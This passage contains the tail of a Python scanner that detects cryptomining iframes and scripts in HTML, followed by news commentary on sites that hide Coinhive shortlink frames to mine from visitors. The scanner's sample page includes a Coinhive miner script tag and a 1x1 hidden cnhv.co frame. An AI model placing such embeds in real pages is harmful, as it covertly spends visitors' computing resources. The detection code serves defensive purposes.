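    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        src = a.get("src") or ""
        host = _host(src)
        if tag == "iframe":
            hidden = (_is_tiny(a.get("width")) or _is_tiny(a.get("height"))
                      or _style_hides(a.get("style")))
            if host in MINER_HOSTS:
                # Known shortener host in a frame: flag it regardless of size.
                self.findings.append({"kind": "miner_iframe", "src": src, "hidden": hidden})
            elif hidden and host:
                # A third-party frame the visitor cannot see: worth a manual look.
                self.findings.append({"kind": "hidden_iframe", "src": src, "hidden": hidden})
        elif tag == "script":
            if host in MINER_HOSTS or src.lower().endswith(MINER_SCRIPT_NAMES):
                self.findings.append({"kind": "miner_script", "src": src, "hidden": False})


def scan_html(html):
    """Return the list of findings for one HTML document, in document order."""
    parser = MinerFrameScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample page: one legitimate embed, one 1x1 cnhv.co frame
# (the short code is made up), one CSS-hidden tracker frame, one miner script.
SAMPLE_HTML = """<html><body>
<h1>Recipes</h1>
<iframe src="https://www.youtube.com/embed/EXAMPLE" width="560" height="315"></iframe>
<iframe src="https://cnhv.co/EXAMPLECODE" width="1" height="1" style="border:0"></iframe>
<iframe src="https://tracker.example/pixel" style="display:none"></iframe>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
</body></html>"""

if __name__ == "__main__":
    for f in scan_html(SAMPLE_HTML):
        print(f"{f['kind']:14} hidden={f['hidden']!s:5} {f['src']}")
```

Run against the constructed page, the scanner reports the cnhv.co frame as `miner_iframe` (hidden), the tracker frame as `hidden_iframe`, and the script tag as `miner_script`; the visible YouTube embed is ignored. The `hidden_iframe` bucket is deliberately broad, since a 1×1 or `display:none` frame to an unfamiliar host is exactly what an injected shortlink looks like before its domain is on any list.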

Other security researchers have also flagged the trick.

According to Leal, some of the sites using the trick appear to have been compromised, but others seem not to be: their owners are intentionally using the iFrame to stealthily cryptomine from their visitors.

“There needs to be an increased focus on adding controls so that this type of blatant abuse can be stopped, or at least greatly reduced. As it stands, it seems to be too easy for this abuse to occur, injuring the credibility of legitimate websites who want to ethically use cryptomining as a form of monetization,” he noted.


from Help Net Security https://ift.tt/2ki5Mxv